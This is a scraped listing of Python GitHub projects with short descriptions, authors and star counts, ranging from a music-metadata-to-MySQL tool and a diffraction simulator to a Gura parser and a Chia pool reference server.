This Python library searches through a static directory (needs to match your environment) and appends artist, title, track number, album title, duration, and genre to a .json object. This .json object is then used to post data to a specified table in a local MySQL database, credentials of which the user must set.

Edan Ybarra 1 Dec 30, 2021
Navigate to your directory of choice the proceed as follows

Installation ?? Navigate to your directory of choice the proceed as follows; 1 .Clone the git repo and create a virtual environment Depending on your

Ondiek Elijah Ochieng 2 Jan 31, 2022
An example project that shows how to check if a certain macro is active in a file.

PlatformIO Check Compiler Flags Example Description Demonstrates the usage of an extra script and a special compilter invocation to get the active mac

Maximilian Gerhardt 1 Oct 28, 2021
A simply program to find active jackbox.tv game codes

PeepingJack A simply program to find active jackbox.tv game codes How does this work? It uses a threadpool to loop through all possible codes in a ran

null 1 Nov 28, 2021
Active Transport Analytics Model: A new strategic transport modelling and data visualization framework

{ATAM} Active Transport Analytics Model Active Transport Analytics Model (“ATAM”

ATAM Analytics 1 Jan 12, 2022
Implementation of the Angular Spectrum method in Python to simulate Diffraction Patterns

Diffraction Simulations - Angular Spectrum Method Implementation of the Angular Spectrum method in Python to simulate Diffraction Patterns with arbitr

Rafael de la Fuente 167 Feb 15, 2022
Python implementation of the ASFLIP advection method

This is a python implementation of the ASFLIP advection method . We would like to hear from you if you appreciate this work.

Raymond Yun Fei 115 Feb 16, 2022
A Gura parser implementation for Python

Gura parser This repository contains the implementation of a Gura format parser in Python. Installation pip install gura-parser Usage import gura gur

JWare Solutions 19 Jan 25, 2022
A python implementation of differentiable quality diversity.

Differentiable Quality Diversity This repository is the official implementation of Differentiable Quality Diversity.

ICAROS 33 Feb 20, 2022
Reference python implementation of Chia pool operations for pool operators

This repository provides a sample server written in python, which is meant to server as a basis for a Chia Pool. While this is a fully functional implementation, it requires some work in scalability and security to run in production.

Chia Network 450 Feb 17, 2022
A fast python implementation of DTU MVS 2014 evaluation

DTUeval-python A python implementation of DTU MVS 2014 evaluation. It only takes 1min for each mesh evaluation. And the gap between the two implementa

null 39 Jan 13, 2022
Double Pendulum implementation in Python, now with added pendulums and trails :D

Double Pendulum Using Curses in Python. A nice relaxing double pendulum simulation using ASCII, able to simulate multiple pendulums at once, and provi

Nekurone 55 Feb 11, 2022